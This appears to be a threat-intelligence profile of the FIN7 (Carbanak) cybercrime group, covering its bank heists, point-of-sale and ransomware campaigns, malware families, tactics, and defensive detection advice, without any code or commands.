FIN7

Background

FIN7, also tracked as Carbanak and Sangria Tempest, is one of the most prolific financially motivated cybercrime groups in history. The group emerged around 2013 and initially targeted banks directly using the Carbanak backdoor, stealing an estimated $1 billion from over 100 financial institutions across 40 countries. The group is believed to operate out of Russia and Ukraine, with members arrested in multiple countries.

Over time, FIN7 evolved its targeting from banks to the retail, restaurant, and hospitality sectors, focusing on point-of-sale (POS) systems to steal payment card data at scale. The group operated with a corporate-like structure, running a fake cybersecurity company called Combi Security (and later Bastion Secure) to recruit unwitting penetration testers who unknowingly conducted criminal operations.

In 2018, three senior members were arrested and subsequently convicted, but the group continued operations with minimal disruption. By 2020-2022, FIN7 pivoted toward ransomware, establishing partnerships with REvil, Maze, BlackCat/ALPHV, and DarkSide ransomware operations. This evolution from pure financial crime to ransomware partnerships made FIN7 even more dangerous and profitable.

Notable Campaigns

Carbanak Banking Heists (2013-2016): FIN7 compromised over 100 banks worldwide, manipulating SWIFT transfers, ATM networks, and e-payment systems. The group stole approximately $1 billion, making it one of the largest cyber-enabled bank heists in history. They used spear-phishing emails to gain initial access, then spent months conducting reconnaissance inside banking networks before executing coordinated cash-outs.

U.S. Restaurant and Retail Campaign (2016-2018): The group targeted over 6,500 individual POS terminals at more than 3,600 business locations across 47 U.S. states. Major victims included Chipotle, Chili's, Arby's, Red Robin, and Jason's Deli. The attackers used carefully crafted phishing emails impersonating suppliers, followed by deployment of the PILLOWMINT POS malware to harvest payment card data.

Bastion Secure Front Company (2021): FIN7 created a fake cybersecurity firm called Bastion Secure, complete with a professional website and job postings. The company recruited legitimate IT professionals and had them conduct what they believed were penetration tests, but which were actually real intrusions against FIN7 targets. Recorded Future and Gemini Advisory exposed the operation.

Ransomware Partnerships (2020-2023): FIN7 operators provided initial access and tools to multiple ransomware-as-a-service operations including REvil, DarkSide (responsible for the Colonial Pipeline attack), BlackCat/ALPHV, and Maze. The group leveraged its sophisticated intrusion capabilities to breach high-value targets and then handed off to ransomware affiliates for encryption and extortion.

POWERTRASH and Lizar Campaigns (2022-2023): FIN7 deployed new tooling including the POWERTRASH loader and Lizar (also called TIRION) post-exploitation framework, targeting U.S.-based organizations with malicious USB drives and sophisticated phishing campaigns that leveraged trusted cloud services for command and control.

Tactics, Techniques & Procedures

FIN7 is known for exceptionally well-crafted spear-phishing campaigns. Their phishing emails are highly targeted, often referencing specific business contexts relevant to the victim, and typically carry weaponized Microsoft Office documents with embedded macros or LNK files. The group has also used malicious USB drives shipped via postal mail as an initial access vector.

Once inside a network, FIN7 follows a methodical approach: they establish persistence using scheduled tasks and registry modifications, conduct extensive internal reconnaissance to map the network and identify high-value systems, and move laterally using stolen credentials and legitimate remote access tools. They are patient operators who may dwell in networks for months before taking action.

The group extensively uses living-off-the-land techniques, leveraging PowerShell, WMI, and built-in Windows utilities to blend in with legitimate activity. They also deploy custom tooling including their GRIFFON JavaScript backdoor, BIRDWATCH downloader, and the POWERPLANT backdoor framework. For command and control, they frequently abuse legitimate cloud services and DNS tunneling to evade network detection.

Tools & Malware

• Carbanak: The group's signature backdoor, a full-featured remote access trojan capable of keylogging, screen capture, credential theft, and remote desktop control. Used extensively in banking heists.
• GRIFFON: A lightweight JavaScript backdoor used for initial reconnaissance and payload delivery.
• POWERPLANT: A large PowerShell-based backdoor framework with modular capabilities.
• BIRDWATCH / CROWVIEW: .NET-based downloaders used in later campaigns for payload delivery.
• PILLOWMINT: Custom POS malware designed to scrape payment card data from process memory.
• Cobalt Strike: Commercially available adversary simulation tool heavily abused for post-exploitation.
• Lizar (TIRION): A modular post-exploitation toolkit serving as a Carbanak successor.
• POWERTRASH: An obfuscated PowerShell loader used to deploy various payloads in memory.

Indicators & Detection

Detection of FIN7 activity should focus on multiple layers. Monitor for highly targeted phishing emails with weaponized Office documents, particularly those impersonating business partners or using food-industry and hospitality-related lures. Implement strict macro execution policies and monitor for suspicious VBA/macro execution chains.

On endpoints, watch for PowerShell execution with heavy obfuscation, scheduled task creation for persistence, and process injection into legitimate Windows processes. FIN7 frequently uses mshta.exe, wscript.exe, and cscript.exe to execute malicious scripts. Monitor for unusual DNS query patterns that may indicate DNS tunneling for C2 communication.

Network-level detection should focus on identifying beaconing patterns to cloud services (particularly uncommon endpoints), large data exfiltration to external destinations, and lateral movement patterns including anomalous RDP and SMB connections. Deploy POS-specific monitoring on payment processing systems to detect memory scraping activity. Behavioral analytics that baseline normal user and system activity are particularly effective against FIN7's patient, low-and-slow operational style.